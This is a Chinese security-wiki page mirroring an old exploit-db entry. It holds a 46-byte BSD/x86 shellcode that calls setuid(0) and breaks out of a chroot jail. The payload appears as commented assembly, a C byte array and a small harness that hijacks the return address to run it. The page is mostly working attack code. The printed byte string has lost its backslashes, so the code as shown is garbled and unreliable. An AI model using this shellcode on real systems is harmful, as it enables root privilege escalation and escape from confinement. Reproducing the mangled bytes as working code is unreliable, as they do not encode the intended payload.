BSD/x86 – setuid(0) + Break chroot (../ 10x Loop) Shellcode (46 bytes)

BSD/x86 – setuid(0) + Break chroot (../ 10x Loop) Shellcode (46 bytes)

漏洞ID 1054601 漏洞类型
发布时间 2004-09-12 更新时间 2004-09-12
图片[1]-BSD/x86 – setuid(0) + Break chroot (../ 10x Loop) Shellcode (46 bytes)-安全小百科CVE编号 N/A
图片[2]-BSD/x86 – setuid(0) + Break chroot (../ 10x Loop) Shellcode (46 bytes)-安全小百科CNNVD-ID N/A
漏洞平台 BSD_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13453
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/* The setuid(0)+chroot() shellcode
   it will put '../' 10 times
   Size  46 bytes
   OS	 *BSD
  		/rootteam/dev0id	(www.sysworld.net)
			[email protected] 

BITS	32

jmp short callme
main:
	pop	esi
	mov	edi,esi
	xor	ecx,ecx
	push	ecx
	mov	al,0x17
	push	eax
	int	0x80
	xor	eax,eax
	push	eax
	mov	cl,0x1e
	mov	al,0x2e
	repne   stosb
	pop	eax
	stosb
	mov	cl,0x1e
main_loop:
	dec	cl
	inc byte [esi+ecx]
	dec	cl
	loop	main_loop
	push 	esi
	mov	al,0x3d
	push	eax
	int	0x80
callme:
	call	main

*/
char shellcode[] =
	"xebx27x5ex89xf7x31xc9x51xb0x17x50xcdx80x31xc0"
	"x50xb1x1exb0x2exf2xaax58xaaxb1x1exfexc9xfex04"
	"x0exfexc9xe2xf7x56xb0x3dx50xcdx80xe8xd4xffxff"
	"xff";

int
main(void)
{
	int *ret;
	ret = (int*)&ret + 2;
	(*ret) = shellcode;
}

// milw0rm.com [2004-09-12]

相关推荐: Cooolsoft PowerFTP Server漏洞

Cooolsoft PowerFTP Server漏洞 漏洞ID 1205086 漏洞类型 未知 发布时间 2001-11-28 更新时间 2001-11-28 CVE编号 CVE-2001-0933 CNNVD-ID CNNVD-200111-052 漏洞平…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享